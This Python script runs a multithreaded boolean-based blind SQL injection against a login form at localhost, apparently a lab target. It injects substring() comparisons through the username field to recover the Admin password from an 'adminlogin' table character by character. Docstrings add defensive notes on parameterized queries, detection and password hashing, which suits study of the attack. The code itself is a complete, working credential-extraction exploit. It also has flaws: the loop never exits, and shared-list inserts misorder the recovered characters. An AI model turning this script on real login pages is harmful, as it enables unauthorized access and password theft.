import requests
from threading import Thread, Lock

# Shared by every worker thread: characters recorded by ThreadJob, which
# mutates this list only while holding the lock it is given.
result = list()
def ThreadJob(x,p,lock):
        """Probe a lab login form with a boolean-based blind SQL injection test.

        For position ``p`` (then ``p + 1``, and so on) every character of ``x``
        is submitted as a guess inside a ``substring()`` comparison placed in
        the ``username`` field. A response containing ``"Welcome,"`` is taken
        as the "true" answer and the guessed character is stored in the global
        ``result`` list while ``lock`` is held.

        Args:
            x: sequence of candidate characters; indexed at ``x[25]``, so it
                is expected to hold at least 26 entries.
            p: 1-based position compared by ``substring()``; incremented after
                each pass over ``x``.
            lock: ``threading.Lock`` guarding ``result`` and the progress print.

        Reviewer notes (defensive):
            * The test only yields an answer when the server builds its query
              by concatenating the submitted username; a parameterized query
              removes the true/false oracle entirely.
            * The traffic is distinctive: a long run of login POSTs whose
              ``username`` carries a quote, ``substring(`` and a trailing
              comment marker, with a constant dummy password. Input logging
              and login rate limiting both surface it.
            * Whatever is stored in the ``password`` column is what leaks, so
              storing a salted, slow password hash limits the value of a leak.
            * The outer loop has no exit condition, so this function does not
              return on its own.
        """
        global result
        # Lab endpoint hosting the deliberately vulnerable login form.
        target = "http://localhost:1234"
        while True :
                for guess in x:
                        # Boolean condition injected through the username field:
                        # true only when character p of the stored value equals
                        # the current guess.
                        payload = "".join((
                                "' or substring((SELECT password FROM adminlogin WHERE username='Admin'),",
                                str(p),
                                ",1) ='",
                                guess,
                                "'  -- -",
                        ))
                        reply = requests.post(
                                url=target,
                                data={'username' : payload, 'password' : 'aaa'},
                        )
                        # The success banner is the only signal read back.
                        if "Welcome," not in reply.text:
                                # x[25] is the last entry of a 26-character
                                # alphabet: nothing matched at this position.
                                if guess == x[25]:
                                        break
                                continue
                        lock.acquire()
                        result.insert(p, guess)
                        print(result)
                        lock.release()
                        break
                p += 1

def main():
        """Start one ThreadJob worker per character class and wait for them.

        Three 26-character alphabets are tried in parallel, each worker
        starting at position 1 and sharing a single lock: lowercase letters,
        uppercase letters, and digits plus a set of special characters.
        Characters outside these three strings are never tested.

        NOTE(review): ThreadJob loops without an exit condition, so the
        ``join()`` calls are not expected to return and the final print is
        only reached if the workers stop for another reason.
        """
        alphabets = (
                # lowercase letters
                "azertyuiopqsdfghjklmwxcvbn",
                # uppercase letters
                "AZERTYUIOPMLKJHGFDSQWXCVBN",
                # digits and special characters
                "1234567890(-_)}]@|[{#~*%$?",
        )
        # One lock shared by all workers protects the global result list.
        lock = Lock()
        workers = [
                Thread(target=ThreadJob, args=(alphabet, 1, lock))
                for alphabet in alphabets
        ]

        for worker in workers:
                worker.start()

        for worker in workers:
                worker.join()
        print(result)

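# Run only when executed as a script, so that importing this module never
# starts the worker threads or sends any request.
if __name__ == "__main__":
        main()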